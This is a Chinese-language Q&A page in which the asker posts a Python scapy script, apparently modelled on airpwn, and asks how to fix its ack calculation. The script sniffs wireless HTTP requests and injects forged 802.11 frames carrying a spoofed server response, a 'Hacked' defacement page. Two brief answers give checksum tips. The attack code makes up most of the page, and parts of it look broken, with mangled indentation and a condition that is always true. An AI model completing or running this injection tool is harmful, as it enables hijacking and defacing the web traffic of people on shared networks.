在无线局域网中使用scapy创建欺骗HTTP响应

Question

我用python-scapy创建了像airpwn这样的程序。现在，我可以嗅探它并伪造802.11个数据包，指定任何欺骗所需的值，并将其发送到受害者机器，但它不起作用。我想是因为我在计算欺骗ack数时出错了。请告诉我如何重新计算ack数或我遗漏了什么。

#!/usr/bin/env python

from scapy.all import *
from scapy.error import Scapy_Exception
import os
import HTTP
##### Start promicuous mode with airmon-ng start wlan0 11 (airmon-ng start/stop interface channel)
tmp=os.popen("iwconfig 2>&1 | grep ESSID | awk '{print $1}' | grep wlan | grep -v mon")
wlan=tmp.read()
wlan=wlan.rstrip('\n')
m_iface="mon0"
#spoof_response=rdpcap("response.cap")

def pktTCP(pkt):
    if pkt.haslayer(TCP):
        if HTTP.HTTPRequest or HTTP.HTTPResponse in pkt:
            src=pkt[IP].src
            srcport=pkt[IP].sport
            dst=pkt[IP].dst
            dstport=pkt[IP].dport
            test=pkt[TCP].payload
            if (HTTP.HTTPRequest in pkt):
                print "HTTP Request:"
                print "======================================================================"
                print ("Src: ",src," Sport: ",srcport," Dst: ",dst," Dport: ",dstport," Hostname: ",test.Host)
                print ("Seq: ",str(pkt[TCP].seq)," | Ack: ",str(pkt[TCP].ack))
                print ("Wireless: ",wlan)

                dot11_frame = RadioTap()/Dot11(
                    type = "Data",
                    FCfield = "from-DS",
                    addr1 = pkt[Dot11].addr2,
                    addr2 = pkt[Dot11].addr1,
                    addr3 = pkt[Dot11].addr1,
                    )

                #### Spoof HTTP Response
                                day=time.strftime("%a, %d %Y %T GMT+7")
                                #print day
                                spoof_Page="<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\"><html><head><title>Hacked</title></head><body><p>Hacked By Sumedt</font></p></body></html>"
                len_of_page=len(spoof_Page)
                spoof_HTTP_Response_Header="HTTP/1.1 200 OK\x0d\x0aDate: "+day+"\x0d\x0aContent-Type: text/html; charset=UTF-8\x0d\x0aContent-Length: "+str(len_of_page)+"\x0d\x0a\x0d\x0a"
                                Spoof_Payload=spoof_HTTP_Response_Header+spoof_Page


                #### Crafing HTTP Response Packet
                spoof_response=dot11_frame/LLC(ctrl=3)/SNAP()/IP()/TCP()/Spoof_Payload
                #### Spoof IP
                spoof_response.dst=pkt[IP].src
                spoof_response.src=pkt[IP].dst
                spoof_response.ttl=pkt[IP].ttl
                #### Spoof TCP
                spoof_response.sport=pkt[TCP].dport
                spoof_response.dport=pkt[TCP].sport
                spoof_response.window=dport=pkt[TCP].window
                spoof_response.seq=pkt[TCP].ack

                ### Recalculate chksum and ack              
                spoof_response.ack=(pkt[TCP].seq + len(Spoof_Payload)) & 0xffffffff
                del spoof_response.chksum
                ### For recalculate chksum
                spoof_response = spoof_response.__class__(str(spoof_response))

                print "Finish specific value"
                #spoof_response.show()
                sendp(spoof_response)

print "Start Sniffing"
sniff(iface=m_iface,prn=pktTCP)

Answer 1

如果您更改了有效负载的内容，则MAC侦听器和TCP报头中的校验和也应更改。否则该分组将被认为是错误的分组并被自动丢弃。

Answer 2

在删除spoof_response.chksum之后，我认为您重新初始化了该变量。

喜欢

spoof_response.chksum = spoof_response.__class__(str(spoof_response))